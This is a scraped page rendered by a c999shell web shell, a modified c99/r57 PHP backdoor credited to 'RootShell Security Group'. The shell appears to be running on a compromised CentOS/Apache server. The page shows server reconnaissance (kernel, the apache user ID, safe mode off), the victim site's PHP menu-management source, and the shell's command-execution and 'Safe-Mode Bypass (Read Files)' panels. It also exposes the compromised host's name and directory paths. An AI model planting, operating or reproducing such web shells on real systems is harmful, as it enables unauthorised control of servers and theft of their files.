Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x | |
| Viewing file: Select action/file-type: AddNew(); $obj->MnStID=$_POST['MnStID']; //$obj->MnID=$MnID; //$obj->MnSeq=$MnSeq; $obj->MnIcon=$_POST['MnIcon']; $obj->MnNameT=$_POST['MnNameT']; $obj->MnNameE=$_POST['MnNameE']; $obj->MnURL=$_POST['MnURL']; $obj->MnDesc=$_POST['MnDesc']; $obj->MnToolbar=$_POST['MnToolbar']; $obj->MnToolbarSeq=$_POST['MnToolbarSeq']; $obj->MnToolbarIcon=$_POST['MnToolbarIcon']; $obj->MnParentMnID=$_POST['MnParentMnID']; $obj->MnLevel=$_POST['MnLevel']; $obj->Save(); }else if($_POST['method']=="edit"){ $obj->SearchByKey($_POST['MnID']); $obj->GetRecord(); $obj->Edit(); $obj->MnIcon=$_POST['MnIcon']; $obj->MnNameT=$_POST['MnNameT']; $obj->MnNameE=$_POST['MnNameE']; $obj->MnURL=$_POST['MnURL']; $obj->MnDesc=$_POST['MnDesc']; $obj->MnToolbar=$_POST['MnToolbar']; $obj->MnToolbarSeq=$_POST['MnToolbarSeq']; $obj->MnToolbarIcon=$_POST['MnToolbarIcon']; $obj->Save(); }else if($_POST['method']=="delete"){ $obj->SearchByKey($_POST['MnID']); $obj->GetRecord(); $obj->Delete(); }else if ($_POST['method']=="updown"){ $obj->swapMenu($ud, $MnStID, $MnID, $MnSeq, $PmnID, $MnLevel); } //$obj->Close(); //$conn->Disconnect(); //else if($method=="deletebytopic"){ // $flg = $obj->DeleteMenuByTopic($MnID); //} // if ($flg==false){ // $msg_err = "à¡Ô´¢éͼԴ¼ÅÒ´ : " . mysql_error(); // } // // $conn->Disconnect(); echo ""; ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]-- |